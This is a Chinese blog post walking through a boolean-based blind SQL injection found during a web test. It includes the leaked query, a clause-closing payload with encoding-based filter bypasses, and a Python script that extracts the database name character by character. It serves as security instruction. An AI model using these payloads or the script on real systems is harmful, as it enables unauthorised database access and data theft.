您好,登錄后才能下訂單哦!
今天就跟大家聊聊有關(guān)如何進(jìn)行布爾型盲注的PY交易分析,可能很多人都不太了解,為了讓大家更加了解,小編給大家總結(jié)了以下內(nèi)容,希望大家根據(jù)這篇文章可以有所收獲。
經(jīng)過(guò)上一篇的良好反饋,我正好在項(xiàng)目中發(fā)現(xiàn)了這個(gè)布爾型漏洞,就編寫了本篇文章,主體格式一樣,但內(nèi)容針對(duì)不同,下次看看在弄個(gè)什么的PY交易好,讓我再想想。
在這次的測(cè)試過(guò)程中發(fā)現(xiàn)了一個(gè)注入點(diǎn),通過(guò)測(cè)試發(fā)現(xiàn)返回包內(nèi)包含了sql語(yǔ)句,確認(rèn)可以注入,開始了這次的注入嘗試。
首先我們可以確認(rèn)這是一個(gè)GET型數(shù)據(jù)調(diào)用,本以為是簡(jiǎn)單的報(bào)錯(cuò)注入,應(yīng)該可以直接利用sqlmap進(jìn)行漏洞的利用,但現(xiàn)實(shí)狠狠的給了我一個(gè)耳光。sqlmap根本法利用這個(gè)漏洞,但返回的數(shù)據(jù)包中實(shí)打?qū)嵆霈F(xiàn)我數(shù)據(jù)庫(kù)語(yǔ)句,所以我把返回的數(shù)據(jù)庫(kù)語(yǔ)句拿出來(lái),開始了一點(diǎn)點(diǎn)的構(gòu)造進(jìn)程。
復(fù)制出來(lái)的數(shù)據(jù)庫(kù)語(yǔ)句:
SELECT count(0) FROM customer c WHERE c.dealership_id = ? AND c.active = true AND (c.full_name LIKE '%1%') AND 1 IN (1, 2) AND (c.full_name LIKE '%test%' OR c.phone_number LIKE '%1%') AND 1 IN (1, 2) AND (c.full_name LIKE '%test%' OR c.phone_number_sub1 LIKE '%1%') AND 1 IN (1, 2) AND (c.full_name LIKE '%test%' OR c.phone_number_sub2 LIKE '%1%') AND 1 IN (1, 2) AND (c.full_name LIKE '%test%')
經(jīng)過(guò)實(shí)驗(yàn),發(fā)現(xiàn)報(bào)錯(cuò)內(nèi)容不同,可說(shuō)明與參數(shù)確實(shí)可以影響數(shù)據(jù)庫(kù)語(yǔ)句。但返回的內(nèi)容需要進(jìn)行閉合而且返回內(nèi)容不可以利用,所以可以排除報(bào)錯(cuò)等類型注入形式,可以探測(cè)的注入類型就僅剩下兩種了:時(shí)間型盲注,布爾型盲注直接在目標(biāo)后加入測(cè)試語(yǔ)句。
構(gòu)造數(shù)據(jù)庫(kù)語(yǔ)句:
%'){測(cè)試語(yǔ)句}AND(c. full_name like '%test
返回成功,實(shí)現(xiàn)語(yǔ)句閉合(此外利用了數(shù)據(jù)庫(kù)模糊查詢like %%),在測(cè)試過(guò)種發(fā)現(xiàn)存在過(guò)濾,單獨(dú)%無(wú)法通過(guò),空格無(wú)法通過(guò),系統(tǒng)會(huì)返回404,針對(duì)之前爆出的數(shù)據(jù)庫(kù)語(yǔ)句,利用%25和%20繞過(guò)對(duì)對(duì)單獨(dú)%和空格的過(guò)濾構(gòu)造出以上的數(shù)據(jù)庫(kù)語(yǔ)句完成語(yǔ)句的閉合,成功返回200,確認(rèn)可以返回正常數(shù)據(jù)包,并可以根據(jù)數(shù)據(jù)庫(kù)語(yǔ)句的正確來(lái)進(jìn)行布爾型盲注測(cè)試。
接下來(lái)確認(rèn)測(cè)試語(yǔ)句
27)and%0a(ascii(substr(database(),{1},1))={0})%0aAND(c.full_name%0alike%0a%27%25test
按位截取的形式進(jìn)行匹配,確認(rèn)數(shù)據(jù)庫(kù)名稱
利用python的數(shù)據(jù)包發(fā)送來(lái)批量測(cè)試目標(biāo)內(nèi)容
和時(shí)間型盲注不同,布爾型盲注要根據(jù)返回?cái)?shù)據(jù)包的不同來(lái)確認(rèn)問(wèn)題
%0a(ascii(substr(database(),{1},1))={0})%0a
利用find函數(shù)來(lái)查找返回的數(shù)據(jù)特征,判斷是否成功得到注入數(shù)據(jù)
# coding:utf-8 import requests import datetime import time headers = { 頭信息,自己添加 } chars = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123456789@_.' database = '' for j in range(1,11): for i in range(49,125): Url = 'https://xxxxxxxxxxxxxxxxxxxxxxxxxxxxx/find?pageNo=1&pageSize=20&searchWord=1%25%27)and%0a(ascii(substr(database(),{1},1))={0})%0aAND(c.full_name%0alike%0a%27%25test' UrlFormat = Url.format(i,j) #format()函數(shù)使用 r = requests.get(UrlFormat,headers=headers) d = r.content.find("Test") #利用find函數(shù)來(lái)查找返回的數(shù)據(jù)特征,判斷是否成功得到注入數(shù)據(jù) if d != -1: print(i) print chr(i) database += chr(i) print database break else: pass
對(duì)于代碼的未來(lái),有如下的想法
1.加入數(shù)據(jù)包直接調(diào)用的功能
2.針對(duì)0值永真的修改
3.進(jìn)行線程上的優(yōu)化
4.編寫GET方法的代碼
5.進(jìn)行整體代碼的邏輯重構(gòu)(這個(gè)是吹NB)
看完上述內(nèi)容,你們對(duì)如何進(jìn)行布爾型盲注的PY交易分析有進(jìn)一步的了解嗎?如果還想了解更多知識(shí)或者相關(guān)內(nèi)容,請(qǐng)關(guān)注億速云行業(yè)資訊頻道,感謝大家的支持。
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。